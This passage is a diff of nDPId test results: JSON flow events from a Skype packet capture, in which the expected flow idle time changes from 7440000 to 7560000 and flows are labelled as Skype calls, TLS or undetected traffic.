-00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970685835,"flow_last_seen":1431970687666,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970685835,"flow_last_seen":1431970687666,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706168,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636300,"flow_last_seen":1431970662705,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1178,21 +1178,21 @@ 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706169,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634432,"flow_last_seen":1431970687929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634431,"flow_last_seen":1431970687929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 